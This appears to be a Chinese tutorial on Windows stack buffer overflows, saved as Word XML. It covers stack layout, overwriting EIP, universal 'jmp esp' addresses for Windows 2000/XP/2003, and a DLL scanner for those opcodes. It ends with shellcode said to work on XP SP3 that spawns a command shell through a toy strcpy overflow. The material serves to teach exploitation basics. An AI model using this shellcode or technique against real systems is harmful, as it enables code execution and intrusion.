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缓冲区溢出介绍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    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　缓冲区溢简单说，是大的数据存入了小缓冲区，又不对存入数据进行边界判断，最终导致小缓冲区被撑爆。大的数据污染了小缓冲区附近的内存。污染的内存可能带来改变程序控制流、夺取操作系统、禁止访问等多种结果。就好比一杯水，倒满了水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多余的就溢出到外面来了。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    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缓冲区溢出主要可以分成三种：静态数据溢出、栈溢出和堆溢出。产生这三种不同的溢出根源在于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的内存结构；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的内存可以被分成两个层面：物理内存和虚拟内存。我们一般看到的其实只是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的虚拟内存。在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会给所有进程都分配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4G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内存（无论物理内存真实多大）；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会把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4G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内存分成代码区、数据区、堆区、栈区。数据区存储的是进程的全局变量。如果利用这里的数据进行缓冲区溢出那么就被称为静态数据溢出。同样利用栈区和堆区进行缓冲区溢出，则相应被称作栈溢出和堆溢出。静态数据溢出虽然技术难度低但是灵活性和可以利用范围低，所以本文就不介绍了。堆溢出相对复杂，将在别的文章介绍。本文介绍的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下的栈溢出，想要知道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下的栈溢出如何利用，首先要理解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下的栈结构。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栈工作原理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如上所示，想要知道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下的栈溢出如何利用，首先要理解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下的栈结构。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718945" cy="4258945"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="图片 1" descr="https://images2015.cnblogs.com/blog/1124287/201703/1124287-20170326083740940-78364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24287/201703/1124287-20170326083740940-78364030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如上图所示，栈其实是一种数据结构，它遵从先进后出的原则。这个先进后出的意思也很简单，就是说先存储进去的数据，会被放在最里边，而后面存入的，则依次向外，所以最先进去的，最后才能出来。进出都是同一个出口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形象一点说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就好比箱子放书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最先放进去的书总在最下面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而后面的书叠在上面。想要去最底层的书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就必须吧上面的书取出来。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通过这张图，相信大家也能够更加容易的理解栈这个东西了。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实战</w:t>
      </w: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c</w:t>
      </w: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初探栈溢出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下面将简单介绍一下溢出的概念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"stdio.h"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"string.h"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"stdlib.h"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exp[] =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"abcdef"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{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output[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strcpy(output,exp);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&amp;&amp;output[i];i++){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"\\0x%x"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,output[i]);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关于其中的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for(int i=0;i&lt;8&amp;&amp;output[i];i++)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该程序的初值为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0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终值为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output[i]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的函数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&amp;&amp;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是于运算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因为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char exp[] = "abcdef";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只赋值了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6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位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所以当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i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等于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7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时的值为空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从而导致循环为假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执行看看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6451600" cy="4208145"/>
            <wp:effectExtent l="19050" t="0" r="6350" b="0"/>
            <wp:docPr id="4" name="图片 4" descr="https://images2015.cnblogs.com/blog/1124287/201703/1124287-20170326095753158-1313503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24287/201703/1124287-20170326095753158-131350386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没毛病。可以输出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这里说一下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这里转换的编码是字符的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16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进制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622800" cy="3776345"/>
            <wp:effectExtent l="19050" t="0" r="6350" b="0"/>
            <wp:docPr id="5" name="图片 5" descr="https://images2015.cnblogs.com/blog/1124287/201703/1124287-20170326095826955-1813765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24287/201703/1124287-20170326095826955-18137652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把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abcdef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都转换了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61 62 63 64 65 66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当我们输入的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数组值超过了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8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位会怎么样？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"stdio.h"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"string.h"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"stdlib.h"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exp[] =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"abcdefghijk"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output[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strcpy(output,exp);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&amp;&amp;output[i];i++){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"\\0x%x"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,output[i]);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执行发现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6451600" cy="4208145"/>
            <wp:effectExtent l="19050" t="0" r="6350" b="0"/>
            <wp:docPr id="8" name="图片 8" descr="https://images2015.cnblogs.com/blog/1124287/201703/1124287-20170326100336690-43568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24287/201703/1124287-20170326100336690-43568493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上面只输入了</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="89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77"/>
        <w:gridCol w:w="8140"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AD7028" w:rsidRPr="00AD7028" w:rsidTr="00AD7028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7" w:type="dxa"/>
              <w:left w:w="187" w:type="dxa"/>
              <w:bottom w:w="107" w:type="dxa"/>
              <w:right w:w="187" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00AD7028" w:rsidRPr="00AD7028" w:rsidRDefault="00AD7028" w:rsidP="00AD70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0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7" w:type="dxa"/>
              <w:left w:w="187" w:type="dxa"/>
              <w:bottom w:w="107" w:type="dxa"/>
              <w:right w:w="187" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00AD7028" w:rsidRPr="00AD7028" w:rsidRDefault="00AD7028" w:rsidP="00AD70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028">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>\0x61\0x62\0x63\0x64\0x65\0x66\0x67\0x68</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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但是程序却出现了问题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859655" cy="4580255"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="图片 9" descr="https://images2015.cnblogs.com/blog/1124287/201703/1124287-20170326100443721-1243989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24287/201703/1124287-20170326100443721-12439895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可以看到只输出了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8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个字符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正好是字符空间的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abcdefgh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原理分析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那么是什么原因导致的程序结束的？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下面给出了一个正常栈时的情况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2192655" cy="3420745"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="10" name="图片 10" descr="https://images2015.cnblogs.com/blog/1124287/201703/1124287-20170326100658861-1115299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24287/201703/1124287-20170326100658861-111529987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：寄存器存放当前线程的栈顶指针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ebp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：寄存器存放当前线程的栈底指针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：寄存器存放下一个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CPU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指令存放的内存地址，当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CPU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执行完当前指令后，从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寄存器中读取下一条指令的内存地址，然后继续执行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原理因为程序要进入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main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函数，所以系统把之前的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EBP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保存在堆栈中，便于以后恢复，然后就是调用函数，调用函数的时候就把函数参数压入堆栈，后面再压入函数返回值之类的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原理继续分析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当输入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abcdefghijklmnop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的时候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147945" cy="3640455"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="图片 11" descr="https://images2015.cnblogs.com/blog/1124287/201703/1124287-20170326101626815-604116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24287/201703/1124287-20170326101626815-6041168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这个长度远远大于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8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，所以溢出的值覆盖了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EBP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的值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导致程序无法执行下一条指令的内存地址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最终导致程序无法正常运行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但是看图有没有发现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弹出的错误框告诉我们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0x706f6e6d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的地址不可读！！！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0x706f6e6d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？？？？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674745" cy="3556000"/>
            <wp:effectExtent l="19050" t="0" r="1905" b="0"/>
            <wp:docPr id="12" name="图片 12" descr="https://images2015.cnblogs.com/blog/1124287/201704/1124287-20170429232542162-1473470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24287/201704/1124287-20170429232542162-147347056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这不是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mnop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的字段么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原来是程序溢出的一段代码覆盖了我们的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EBP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EIP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而堆栈又是以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4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字节为长度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由此算来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正好是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mnop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这四个字符溢出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所以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程序把我们的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mnop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当做指针来返回了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0x706f6e6d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这时又不可读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  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理所当然的就发生错误了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那如果我们精心构造了一个地址呢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？！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漏洞的利用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编写</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD7028">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>shellcode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之前成功的了解了栈的原理及缓冲区溢出的一些基本概念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由于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被覆盖了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也就可以利用覆盖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的值为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来跳转到我们的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指针所指向的地址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871345" cy="3945255"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="13" name="图片 13" descr="https://images2015.cnblogs.com/blog/1124287/201703/1124287-20170326111119315-1866569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24287/201703/1124287-20170326111119315-18665693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这里我们是用的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NNNN/JMP ESP/SSSS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型的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shellcode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从上述可以知道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就是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NOP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也就是为空字节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用来占据缓冲区的长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然后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就是我们的原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地址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s0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开始就是我们那个上面的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shellcode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那么为啥这样就能跳到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shellcode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里面去呢，我们知道程序执行完成之后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会把返回地址弹到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里面，而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这个时候就指向了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的下一位，也就是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s0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的位置，然后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的地址里面是一条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指令，那么就很顺利的跳到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指针的地方去了，如下图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547745" cy="3835400"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="14" name="图片 14" descr="https://images2015.cnblogs.com/blog/1124287/201703/1124287-20170326143942721-1976876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24287/201703/1124287-20170326143942721-197687660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执行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RET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之后的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这时有人就会问，这里的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RET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是什么。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RET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相当于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POP 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，也就是把栈顶指针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所指向的值弹出来给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。所以通常，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RET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执行后，就可以把原来的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回复，从而回到中断前的流程。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378200" cy="3877945"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="15" name="图片 15" descr="https://images2015.cnblogs.com/blog/1124287/201703/1124287-20170326144103033-67354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124287/201703/1124287-20170326144103033-67354240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顺利跳过去执行我们的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shellcode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但由于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的值是不确定的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当然有些版本是固定的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的地址，会由于版本的不同而不一样。比如在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Win2000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User32.dll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中，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指令的地址分别为：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sp0:0x77e2e32a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sp1:0x77e8898b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sp2:0x77e0492b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sp3:0x77e188a7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sp4:0x77e22c75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。以前很多攻击利用程序需要带上对方版本的参数，就是这个原因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0x7ffa4512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lion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分享的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通杀中文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2K,XP,2K3 . jmp esp ;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0x7ffa4512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吧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, 2000, xp, 2003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下通用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如果要想跳转地址更通用，这里推荐现在比较流行的两个：对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Windows 2000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2003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都通用的具有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EBX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功能的地址是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0x7ffa1571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，通用的具有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功能的地址是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0x7ffa4512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AD7028" w:rsidRPr="00AD7028" w:rsidRDefault="00AD7028" w:rsidP="00AD7028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9"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD7028">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>简单的利用原理讲解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下面讲会讲解一个简单的跳转利用讲解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本人是用的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测试的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win7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找不到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（技术欠缺咯）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD7028" w:rsidRP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是因为在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WIN7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以后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,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几个核心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dll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都是浮动地址加载的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,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没有统一的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 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地址。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看如下代码：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"stdio.h"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"windows.h"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m(){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MessageBoxA(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 by 神风"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m();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这里自定义了一个函数为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函数的内容就是调用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MessageBoxA()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也就是弹窗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287000" cy="5867400"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="19" name="图片 19" descr="https://images2015.cnblogs.com/blog/1124287/201704/1124287-20170430111537897-1633999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1124287/201704/1124287-20170430111537897-163399982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当在主函数调用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函数时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效果就是弹窗咯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那么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我们可不可同样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找到这个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函数的地址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然后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函数那去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我们可以用一个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printf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%p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来输出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函数在内存中的地址。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"stdio.h"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"windows.h"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m(){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MessageBoxA(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 by 神风"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"0x%p"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,&amp;m);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如图：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639945" cy="2506345"/>
            <wp:effectExtent l="19050" t="0" r="8255" b="0"/>
            <wp:docPr id="22" name="图片 22" descr="https://images2015.cnblogs.com/blog/1124287/201704/1124287-20170430112329615-1956743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1124287/201704/1124287-20170430112329615-195674393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可以知道地址为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00401520  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类似的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我们就可以利用这个地址来代理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EIP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的值，就会返回到我们的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函数中去了！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD7028" w:rsidRPr="00AD7028" w:rsidRDefault="00AD7028" w:rsidP="00AD7028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9"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD7028">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>最后的完工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到了最后一步了，只需要把我们的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shellcode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写出来就可以了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代码如下：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"stdio.h"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"string.h"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"stdlib.h"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"windows.h"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exp[] =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"abcdefss"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"AAAA"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"\x05\x10\x40\x00"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m(){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MessageBoxA(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 by 神风"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"hack"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output[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strcpy(output,exp);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&amp;&amp;output[i];i++)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"\\0x%x"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,output[i]);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这时候可以看到我们并没有在主函数中调用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但还是成功执行了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m()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10287000" cy="5986145"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="25" name="图片 25" descr="https://images2015.cnblogs.com/blog/1124287/201704/1124287-20170430112747475-1738907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1124287/201704/1124287-20170430112747475-173890792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9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最后放上一个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XP SP3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成功利用的代码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Default="00AD7028" w:rsidP="00AD702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下面利用一个代码（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XP SP3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下通过）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00055230" w:rsidRDefault="00055230" w:rsidP="00AD702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#include &lt;stdio.h&gt;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#include &lt;string.h&gt;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char name[] =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"\x41\x41\x41\x41" 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"\x41\x41\x41\x41"  //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这里填充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8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字节把缓冲区填满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"\x41\x41\x41\x41"  //ebp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填掉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"\x12\x45\xfa\x7f"  //eip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覆盖成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jmp esp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的地址，这个是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sp3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下的地址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lastRenderedPageBreak/>
        <w:t>"\x55\x8B\xEC\x33\xC0\x50\x50\x50" //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这里开始就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00055230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shellcode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"\xC6\x45\xF4\x4D"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"\xC6\x45\xF5\x53"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"\xC6\x45\xF6\x56"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"\xC6\x45\xF7\x43"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"\xC6\x45\xF8\x52"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"\xC6\x45\xF9\x54"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"\xC6\x45\xFA\x2E"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"\xC6\x45\xFB\x44"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"\xC6\x45\xFC\x4C"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"\xC6\x45\xFD\x4C"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"\x8D\x45\xF4\x50\xBA\x7B\x1D\x80\x7C\xFF\xD2"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"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D"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"\x89\x45\xF4\xB8\x61\x6E\x64\x2E"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"\x89\x45\xF8\xB8\x63\x6F\x6D\x22"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"\x89\x45\xFC\x33\xD2\x88\x55\xFF"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"\x8D\x45\xF4\x50\xB8\xC7\x93\xBF\x77\xFF\xD0";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int main()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{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char output[8];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strcpy(output, name);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for(int i=0;i&lt;8&amp;&amp;output[i];i++)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printf("\\0x%x",output[i]);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00055230" w:rsidRPr="00055230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return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00055230" w:rsidRPr="00AD7028" w:rsidRDefault="00055230" w:rsidP="000552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5230">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>}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最后再放上一个查看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JMP ESP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源代码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#include&lt;windows.h&gt;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#include&lt;iostream.h&gt;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#include&lt;tchar.h&gt;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getJmpEsp(TCHAR *ucDllName)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HINSTANCE h;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 = GetModuleHandle(ucDllName);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(h == NULL)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 = LoadLibrary(ucDllName);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(h == NULL)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"ERROR LOADING DLL:"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&lt;&lt;ucDllName&lt;&lt;endl;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BYTE* ptr=(BYTE*)h;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done=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y=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;!done;y++)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(ptr[y] ==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0xFF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ptr[y+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0xE4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pos=(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)ptr + y;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cout&lt;&lt;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"OPCODE found at 0x"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&lt;&lt;hex&lt;&lt;pos&lt;&lt;endl;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(...)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cout&lt;&lt;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"END OF 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&lt;&lt;ucDllName&lt;&lt;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 MEMORY REACHED"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&lt;&lt;endl;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done=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FreeLibrary(h);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getJmpEsp(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"ntdll"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getJmpEsp(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD7028">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="800000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"user32"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D702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702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AD7028" w:rsidRPr="00AD7028" w:rsidRDefault="00AD7028" w:rsidP="00AD70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702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D7028" w:rsidRPr="00AD7028" w:rsidRDefault="00AD7028" w:rsidP="00AD702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参考书籍：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　　　　《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Q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版缓冲区溢出》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　　　　《汇编语言》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我在写本帖时遇到了些难题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印象最深的是一个编译器的问题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如图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287000" cy="5867400"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="28" name="图片 28" descr="https://images2015.cnblogs.com/blog/1124287/201704/1124287-20170430114043147-995972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1124287/201704/1124287-20170430114043147-99597283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我们的溢出程序在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DEVC++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中是可以安全运行的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当时我一脸懵逼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一直以为是代码写错了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最后调试知道是不同的编译器的编译原理不同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而这种差错导致该代码成功执行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原因就是在于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strcpy(output,exp);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函数，并没有把所有的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数组复制过来。而是复制了前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8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个，正好填满了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OUTPUT~~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258945" cy="2133600"/>
            <wp:effectExtent l="19050" t="0" r="8255" b="0"/>
            <wp:docPr id="29" name="图片 29" descr="https://images2015.cnblogs.com/blog/1124287/201704/1124287-20170430114337475-68200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1124287/201704/1124287-20170430114337475-68200562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最后用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VC++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是可以成功溢出的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还有一个就是我在写代码时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把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char exp[] = "abcdef"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这串代码写到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main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外面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我就想能不能写里面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~~~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结果两个编译器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DEVC++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VC++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都无法溢出！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10287000" cy="5986145"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="30" name="图片 30" descr="https://images2015.cnblogs.com/blog/1124287/201704/1124287-20170430114629225-1580272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1124287/201704/1124287-20170430114629225-15802728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9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这里某大牛给出的解答是：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD7028" w:rsidRPr="00AD7028" w:rsidRDefault="00AD7028" w:rsidP="00AD7028">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="133" w:after="133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"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把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定义在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main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函数里相当于在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main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函数入口为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exp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开辟了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11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字节缓冲区，你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strcpy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以后还覆盖不到栈底当然不会溢出了</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD7028">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E729EF" w:rsidRPr="00AD7028" w:rsidRDefault="00E729EF"/>
    <w:sectPr w:rsidR="00E729EF" w:rsidRPr="00AD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EF" w:rsidRDefault="00E729EF" w:rsidP="00AD7028">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="00E729EF" w:rsidRDefault="00E729EF" w:rsidP="00AD7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EF" w:rsidRDefault="00E729EF" w:rsidP="00AD7028">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="00E729EF" w:rsidRDefault="00E729EF" w:rsidP="00AD7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028"/>
    <w:rsid w:val="00055230"/>
    <w:rsid w:val="00AD7028"/>
    <w:rsid w:val="00E7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70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02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D702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D7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7028"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cnblogscodecopy">
    <w:name w:val="cnblogs_code_copy"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00AD7028"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="HTMLChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AD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0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702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70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7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766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16786931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93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3986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81326767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59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1691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37002349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80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843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113547524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4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3600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153370613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59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0491">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="67"/>
          <w:marBottom w:val="67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92136331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82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2019-08-20T23:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-08-20T23:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>